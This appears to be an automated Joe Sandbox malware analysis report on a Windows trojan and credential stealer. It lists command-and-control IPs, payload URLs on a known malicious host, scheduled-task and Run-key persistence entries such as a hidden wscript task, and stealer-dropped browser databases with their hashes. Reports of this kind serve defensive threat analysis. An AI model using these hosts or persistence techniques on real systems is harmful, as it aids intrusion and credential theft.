2.59.161.36	unknown	Russian Federation	44676	VMAGE-ASRU	false
45.155.250.90	unknown	Germany	34549	MEER-ASmeerfarbigGmbHCoKGDE	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.17	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	false
172.67.145.203	unknown	United States	13335	CLOUDFLARENETUS	false
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false
185.156.72.65	unknown	Russian Federation	44636	ITDELUXE-ASRU	false
104.102.49.254	unknown	United States	16625	AKAMAI-ASUS	false
185.215.113.217	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
184.28.90.27	unknown	United States	16625	AKAMAI-ASUS	false
185.208.158.202	unknown	Switzerland	34888	SIMPLECARRER2IT	false
89.105.201.183	unknown	Netherlands	24875	NOVOSERVE-ASNL	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1547295
Start date and time:	2024-11-02 05:01:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 16m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	49
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@90/164@0/17
EGA Information:	Successful, ratio: 40%
HCA Information:	Successful, ratio: 58% Number of executed functions: 107 Number of non-executed functions: 218
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Execution Graph export aborted for target axplong.exe, PID 5856 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 6352 because there are no executed function
Execution Graph export aborted for target file.exe, PID 3440 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive

Simulations

Behavior and APIs

Time	Type	Description
00:03:01	API Interceptor	33400x Sleep call for process: axplong.exe modified
00:03:14	API Interceptor	1987x Sleep call for process: Gxtuum.exe modified
00:03:28	API Interceptor	5080x Sleep call for process: Jurisdiction.pif modified
00:03:36	API Interceptor	8x Sleep call for process: new_v8.exe modified
00:03:38	API Interceptor	2x Sleep call for process: svchost.exe modified
00:03:56	API Interceptor	1341x Sleep call for process: RegAsm.exe modified
00:04:10	API Interceptor	2804x Sleep call for process: 3288f0a855.exe modified
00:04:20	API Interceptor	2x Sleep call for process: GOLD1234.exe modified
00:04:39	API Interceptor	554x Sleep call for process: blurayplayer32.exe modified
00:04:45	API Interceptor	1x Sleep call for process: WerFault.exe modified
05:02:06	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
05:03:14	Task Scheduler	Run new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
05:03:29	Task Scheduler	Run new task: Wall path: wscript s>//B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
05:03:29	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url
05:04:09	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url
05:04:47	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run efbc18aa93.exe C:\Users\user\AppData\Local\Temp\1001588001\efbc18aa93.exe
05:05:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 109418c5c3.exe C:\Users\user\AppData\Local\Temp\1001589001\109418c5c3.exe
05:05:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run efbc18aa93.exe C:\Users\user\AppData\Local\Temp\1001588001\efbc18aa93.exe
05:05:33	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 109418c5c3.exe C:\Users\user\AppData\Local\Temp\1001589001\109418c5c3.exe
05:05:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 51a08c3032.exe C:\Users\user\AppData\Local\Temp\1001590001\51a08c3032.exe
05:06:03	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2bbdb01603.exe C:\Users\user\AppData\Local\Temp\1001591001\2bbdb01603.exe
05:06:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 51a08c3032.exe C:\Users\user\AppData\Local\Temp\1001590001\51a08c3032.exe
05:06:27	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
05:06:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2bbdb01603.exe C:\Users\user\AppData\Local\Temp\1001591001\2bbdb01603.exe
05:06:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 91fe19ab73.exe C:\Users\user\AppData\Local\Temp\1003322001\91fe19ab73.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
52.168.117.173	3WffcqLN3q.exe	Get hash	malicious	Stealc, Vidar	Browse
	CCE_000110.exe	Get hash	malicious	Unknown	Browse
	9poHPPZxlB.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig	Browse
	KKKK.hta	Get hash	malicious	Unknown	Browse
	QtGui4.dll	Get hash	malicious	Unknown	Browse
	hashtab-6.0.0.34-installer_rxb9-U1.exe	Get hash	malicious	PureLog Stealer	Browse
	SecuriteInfo.com.Trojan.Siggen28.118.3827.25470.exe	Get hash	malicious	Unknown	Browse
	JJY.exe	Get hash	malicious	Bdaejec	Browse
	SecuriteInfo.com.Riskware.OfferCore.5002.4698.exe	Get hash	malicious	PrivateLoader	Browse
	K1.zip	Get hash	malicious	Unknown	Browse
1.1.1.1	PO-230821_pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
	AFfv8HpACF.exe	Get hash	malicious	Unknown	Browse	1.1.1.1/
	INVOICE_90990_PDF.exe	Get hash	malicious	FormBook	Browse	www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
	Go.exe	Get hash	malicious	Unknown	Browse	1.1.1.1/
185.215.113.36	WfaD7DZqu0.exe	Get hash	malicious	Amadey	Browse	185.215.113.36/Dem7kTu/index.php
	5GP8oxUsvj.exe	Get hash	malicious	Unknown	Browse	185.215.113.36/zenaaaretest/CPU.zip
	SecuriteInfo.com.generic.ml.7966.exe	Get hash	malicious	Amadey RedLine	Browse	185.215.113.36/DebasedSeptenary_2021-09-29_00-21.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	ICBM.exe	Get hash	malicious	Xmrig	Browse	104.26.9.242
	ICBM.exe	Get hash	malicious	Xmrig	Browse	104.26.8.242
	https://dareka4te.shop	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
MICROSOFT-CORP-MSN-AS-BLOCKUS	spc.elf	Get hash	malicious	Mirai	Browse	21.244.4.50
	m68k.elf	Get hash	malicious	Unknown	Browse	20.127.23.199
	mpsl.elf	Get hash	malicious	Mirai	Browse	52.245.21.241
	arm6.elf	Get hash	malicious	Unknown	Browse	21.9.102.78
	ppc.elf	Get hash	malicious	Mirai	Browse	52.121.72.154
	sh4.elf	Get hash	malicious	Mirai	Browse	21.244.4.80
	x86_32.elf	Get hash	malicious	Gafgyt	Browse	13.64.92.64
	debug.dbg.elf	Get hash	malicious	Gafgyt, Mirai	Browse	40.122.77.40
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	51.105.71.136
	http://168.63.129.16:32526/vmSettings	Get hash	malicious	Unknown	Browse	168.63.129.16
VMAGE-ASRU	drawXuCgTj.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	2.59.161.36
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	2.59.161.36
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	2.59.161.36
	http://rt.authses.online	Get hash	malicious	Unknown	Browse	45.148.244.222
	file.exe	Get hash	malicious	RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	194.116.215.195
	Report-41952.lnk	Get hash	malicious	Unknown	Browse	193.242.145.138
	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	194.116.215.195
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	194.116.215.195
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	194.116.215.195
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	194.116.215.195
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	czxw4iVMHJ.exe	Get hash	malicious	Stealc, Vidar	Browse
	JHPvqMzKbz.exe	Get hash	malicious	Vidar	Browse
	lkIbbNB9ba.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	o3QbCA4xLs.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	N#U0435wIns.exe	Get hash	malicious	Vidar	Browse
C:\ProgramData\LgAmARwZ\Application.exe	lkIbbNB9ba.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	DMv89K955Y.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar	Browse
C:\ProgramData\DZ Blu-ray player 11.1.45\DZ Blu-ray player 11.1.45.exe	G4G14X6zxY.exe	Get hash	malicious	Socks5Systemz	Browse

Created / dropped Files

C:\ProgramData\CAAKFIID

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFHDBFIEGIDGIECBKJECBKFHCA

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAECAECFCAAEBFHIEHDGHDHCBA

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DZ Blu-ray player 11.1.45\DZ Blu-ray player 11.1.45.exe

Download File

Process:	C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4732416
Entropy (8bit):	6.284847018075086
Encrypted:	false
SSDEEP:	98304:3B0VvGRdOWlXpO8U1+u3G2fG6HlVLHB1CgTe15W+:WVvB37f7HDb2
MD5:	72DFEB99DAF355DDE1A7CD0482A98954
SHA1:	BBE61F570508446222CFBEBCC2A648199085B95D
SHA-256:	C1E5AA5CE3B549CFC00285B701F0C074DC66A6087C6ED7F275619C30E7067A70
SHA-512:	B7DBF6278139E994E58E1180C45F568473B3093CD3CF5AD30BBEE30EBDEE579FCF2ACD9781FD20CCA401290A1D2539B762E8097AAC05EC45287B880854D9217A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Joe Sandbox View:	Filename: G4G14X6zxY.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y.L..........#......."...%......{"......."...@...........................H......cH.......................................".......#.h.%..........................................................................."..............................text.....".......".................`....rdata...0...."..2....".............@..@.data...X.....#..2....".............@....rsrc.....%...#...%..(#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIJEBKECBAKFBGDGCBGDBAECAK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDAAFBGDBKJJJKFIIIJJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHDGIEHJJJJEBGDAFHJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\IIEGHJJDGHCAKEBGIJKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIJEBFCFIJJJEBGDBAKEHCAFHI

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJJECGHJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\LgAmARwZ\Application.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	526848
Entropy (8bit):	7.806472978332927
Encrypted:	false
SSDEEP:	12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
MD5:	26D8D52BAC8F4615861F39E118EFA28D
SHA1:	EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
SHA-256:	8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
SHA-512:	1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Joe Sandbox View:	Filename: lkIbbNB9ba.exe, Detection: malicious, Browse Filename: DMv89K955Y.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....z.,..{....,..{....o......(........0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8467188635066618
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugs:gJjJGtpTq2yv1AuNZRY3diu8iBVqF4
MD5:	C0E3F745D9CA05B34A3A52DEC6CE3A79
SHA1:	45860F478C9689F8D3CF535FCE8224B5244EB55D
SHA-256:	37C1EEEA2C6FB0661A5FA227303689C9016409C075C04B16659ADB3B00FF0229
SHA-512:	781399242C28C8E5D63D11E3A4DD054939A961416D79824A161AE4314A415FFA1C86B1C1F7AE1A98EBEA18726BA0C62955E70A3E2E04F43D6E776700EB67EC4C
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x320bc6bf, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6585895241628361
Encrypted:	false
SSDEEP:	1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	291BADF0817405DACD8FFACBBAF42C76
SHA1:	48EDB82A49FC3B3BA390BDBFA131877909EBC65D
SHA-256:	688147BF925F05FB3D20BA975AFE9077C6BCC68A39A7B8BD6C179560C1EC8384
